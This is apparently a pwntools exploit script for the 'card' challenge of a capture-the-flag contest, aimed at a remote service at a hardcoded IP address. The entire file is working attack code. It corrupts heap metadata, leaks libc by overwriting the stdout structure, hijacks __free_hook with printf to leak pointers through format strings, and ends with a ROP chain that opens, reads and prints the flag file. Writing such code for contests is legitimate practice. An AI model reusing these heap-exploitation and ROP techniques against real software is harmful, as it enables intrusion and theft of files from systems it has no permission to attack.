gactf card
from pwn import *
# Session setup for the "card" challenge.  The terminal setting only matters
# when DEBUG (below) attaches gdb in a tmux split.
context.terminal = ["tmux", "splitw", "-h", "-f"]

# Local variant, kept for reference (not active):
#   p = process("./card")
#   libc = ELF("/opt/glibc2.31/lib/libc-2.31.so", checksec=False)
#   libc.off_leak = 3889536
#   p = process("./card", env={"LD_PRELOAD":"./libc.so.6"})

# Remote target and the libc build shipped with the challenge.  Every offset
# below is specific to that ./libc.so.6; a different build needs new values.
p = remote("45.77.72.122", 9777)
libc = ELF("./libc.so.6", checksec=False)
# Distance between the pointer leaked later and the libc base (build-specific).
libc.off_leak = 2013568

# Gadget offsets within libc.so.6, registered as symbols so that they are
# rebased together with the real ones once libc.address is assigned.
for _gadget, _offset in {
    'mov_r10_rdx_jmp_rax': 0x7b0cb,
    'pop_rdi': 0x26b72,
    'pop_rsi': 0x27529,
    'pop_rdx_r12': 0x1626d6,
    'pop_rax': 0x4a550,
    'ret': 0x4a551,
    'pop_r8_rbx_rbp_r12': 0x14cb56,
    'syscall': 0x115cf4,
}.items():
    libc.symbols[_gadget] = _offset
def call_rop(func, rdi, rsi, rdx):
    """Return a ROP fragment that sets rdi, rsi, rdx and then jumps to func.

    Relies on the pop_rdi / pop_rsi / pop_rdx_r12 entries registered in
    libc.symbols.  Judging by its name, the third gadget also pops r12, so an
    extra eight bytes of filler follow rdx before the target address.
    """
    slots = [
        libc.symbols['pop_rdi'], rdi,
        libc.symbols['pop_rsi'], rsi,
        libc.symbols['pop_rdx_r12'], rdx,
    ]
    chain = b"".join(p64(value) for value in slots)
    chain += b"A"*8  # value popped into r12 (unused)
    return chain + p64(func)
# Offset added to the recovered text base later on (see the call_rop calls at
# the end).  NOTE(review): presumably a writable buffer in the challenge
# binary; the value is build-specific -- confirm against the binary in use.
bssbuf = 0x4c60

# gdb commands executed on attach when DEBUG is set.
cmd = "\nx/gx &_IO_2_1_stdout_\n"

# Set DEBUG to a truthy value to attach gdb (with gef) to the process.
DEBUG = 0
gdb_args = ["--init-eval-command='source ~/ctf/tools/gef/gef.py'"]
if DEBUG:
    gdb.attach(p, cmd, gdb_args=gdb_args)
def goto(n):
    """Answer the service's "Choice:" menu prompt with option n."""
    p.sendlineafter("Choice:", f"{n}")
def new(sz):
    """Menu option 1: request a new allocation of sz bytes."""
    goto(1)
    p.sendlineafter("Size:", f"{sz}")
def edit(idx, cnt):
    """Menu option 2: write cnt into slot idx (both answers newline-terminated)."""
    goto(2)
    for answer in (f"{idx}", cnt):
        p.sendlineafter(":", answer)
def drop(idx):
    """Menu option 3: release slot idx."""
    goto(3)
    p.sendlineafter(":", f"{idx}")
def secret(idx, data):
    """Menu option 5: send raw data for slot idx.

    Unlike edit(), the payload is sent with sendafter(), i.e. without a
    trailing newline, so binary data is passed through unchanged.
    """
    goto(5)
    p.sendlineafter(":", f"{idx}")
    p.sendafter(":", data)
# ---- Fixed interaction script against the remote service ----
# The order of these menu calls matters.  Slot indices passed to edit(),
# drop() and secret() are presumably assigned in allocation order by the
# service (new() returns nothing) -- confirm against the binary.
new(0x38)
#a = int(input("off> "), 16)
# 'a' used to be read interactively (commented line above); it is now fixed,
# so the 16-bit value sent via secret(4, ...) below is constant.
a = 0xa
off = (a << 12) | 0x6a0
new(0x28)
new(0x18)
new(0x18)
new(0x28)
new(0x18)
new(0x370)
new(0x100)
new(0x28)
secret(7, p64(0)+p64(0x11)*(0x100//16))
edit(0, b"A"*0x28+p64(0x421))
edit(1, "B"*0x28)
#edit(2, "B"*0x28)
drop(2)
drop(8)
drop(4)
new(0x38)
new(0x38)
#edit(4, "A")
# Only the low two bytes of 'off' are written.
secret(4, p16(off))
new(0x28)
new(0x21)
# After 'pay' is stored in slot 9 the service output is parsed: skip to the
# next newline, discard 8 bytes, then read 8 bytes as a little-endian value.
pay = p64(0x00000000fbad1800)+p64(0)*3+b"\x00"
secret(9, pay)
p.recvuntil("\n")
p.recv(8)
leak = u64(p.recv(8))
print(hex(leak))
pause()
# libc base = leaked value minus the build-specific offset configured above;
# every libc.symbols[...] lookup from here on is relative to this base.
libc.address = leak - libc.off_leak
print(hex(libc.address))
new(0x18)
new(0x18)
new(0x18)
drop(12)
drop(11)
# Slot 0 receives the address of __free_hook after 0x20 bytes of filler.
edit(0, b"A"*0x20+p64(libc.symbols['__free_hook']))
edit(10, "A"*0x18)
new(0x18)
new(0x18)
edit(12, p64(libc.symbols['printf']))
# From here each drop(11) makes the service print a pointer, which is read
# back with recvline() and parsed as hex.
edit(11, "%p")
drop(11)
# 6185 == 0x1829; 'text' is presumably the binary's load base -- confirm.
text = int(p.recvline(),16) - 6185
print(hex(text))
new(0x38)
edit(11, "%8$p")
drop(11)
stackaddr = int(p.recvline(),16) - 0x38
print(hex(stackaddr))
new(0x38)
# Successively shorter writes into slot 11 (8, 6, 5, 4 bytes), then a pointer.
edit(11, b"A"*8+p64(stackaddr))
edit(11, b"A"*6)
edit(11, b"A"*5)
edit(11, b"A"*4)
edit(11, p64(libc.symbols['gets']))
# 0x9782b is a raw libc offset used directly here rather than being
# registered in libc.symbols like the gadgets above.
print(hex(libc.address+0x000000000009782b))
pause()
edit(12, p64(libc.address+0x000000000009782b))
edit(0, "flag\x00")
drop(11)
# ROP chain: open(text+bssbuf, 0, 0); read(3, text+bssbuf, 0x100);
# write(1, text+bssbuf, 0x100).  The "flag" string written to slot 0 is
# presumably what resides at text+bssbuf -- confirm.
orw = call_rop(libc.symbols['open'], text+bssbuf, 0, 0)
orw += call_rop(libc.symbols['read'], 3, text+bssbuf, 0x100)
orw += call_rop(libc.symbols['write'], 1, text+bssbuf, 0x100)
p.sendline(orw)
p.interactive()